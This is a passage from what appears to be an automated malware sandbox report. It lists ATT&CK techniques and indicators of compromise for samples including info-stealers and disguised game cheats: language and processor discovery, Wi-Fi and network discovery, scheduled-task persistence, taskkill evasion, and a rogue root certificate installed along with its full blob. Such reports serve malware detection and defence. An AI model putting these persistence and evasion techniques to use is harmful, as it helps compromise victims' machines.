9364	6120	WerFault.exe	551
5880	9500	WerFault.exe	595
7476	9308	WerFault.exe	583
9536	8384	WerFault.exe	537
8992	5764	WerFault.exe	236
5504	7272	WerFault.exe	590
1180	9308	WerFault.exe	583
7120	5084	WerFault.exe	627
3796	9308	WerFault.exe	583
9256	8876	WerFault.exe	562
8480	8976	WerFault.exe	946
5252	6488	WerFault.exe	280
12064	9308	WerFault.exe	583
9988	10356	WerFault.exe
11904	172	WerFault.exe	597

System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tdrpload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bloxflip%20Predictor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	prem1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GOLD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stealc_daval.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wwbizsrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1281923147.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BroadcomRetest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJSploit_8.10.7_x64-setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LummaC22222.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3374731779.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bloxflip Predictor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ENP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ENP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	penis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tn8cdkzn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	splwow64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZZZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	52836932.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	build_2024-07-25_20-56.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jurisdiction.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ConsoleApp3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tracker.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
976	PING.EXE
8076	PING.EXE
4628	PING.EXE
6396	PING.EXE
8412	PING.EXE
8016	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
7160	cmd.exe
404	netsh.exe

NSIS installer 1 IoCs

installer

resource	yara_rule
behavioral2/files/0x000a000000045c8f-22921.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_daval.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build_2024-07-25_20-56.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_daval.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build_2024-07-25_20-56.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4016	timeout.exe
64	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
9648	ipconfig.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	739	Go-http-client/1.1

Kills process with taskkill 3 IoCs

evasion

pid	Process
5472	taskkill.exe
8336	taskkill.exe
9868	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "4"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	firefox.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache	spoofer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Pictures"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80d43aad2469a5304598e1ab02f9417aa80000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616193"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5000310000000000725979b0100046696c6573003c0009000400efbe725977b0725979b02e0000005f5604000000200000000000000000000000000000008c2c5300460069006c0065007300000014000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "5"	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	penis.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	penis.exe

Runs net.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
8016	PING.EXE
976	PING.EXE
8076	PING.EXE
4628	PING.EXE
6396	PING.EXE
8412	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7260	schtasks.exe
8764	schtasks.exe
9444	schtasks.exe
7976	schtasks.exe
8252	schtasks.exe
7076	schtasks.exe
9036	schtasks.exe
8496	schtasks.exe
7992	schtasks.exe
6500	schtasks.exe
7792	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4932	spoofer.exe
4932	spoofer.exe
5044	stealc_daval.exe
5044	stealc_daval.exe
5044	stealc_daval.exe
5044	stealc_daval.exe
3044	build_2024-07-25_20-56.exe
3044	build_2024-07-25_20-56.exe
3044	build_2024-07-25_20-56.exe
3044	build_2024-07-25_20-56.exe
3044	build_2024-07-25_20-56.exe
3044	build_2024-07-25_20-56.exe
4356	svchost.exe
4356	svchost.exe
1148	powershell.exe
1148	powershell.exe
1148	powershell.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
4356	svchost.exe
1584	2621215564.exe
1584	2621215564.exe
4584	wwbizsrvs.exe
4584	wwbizsrvs.exe
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif
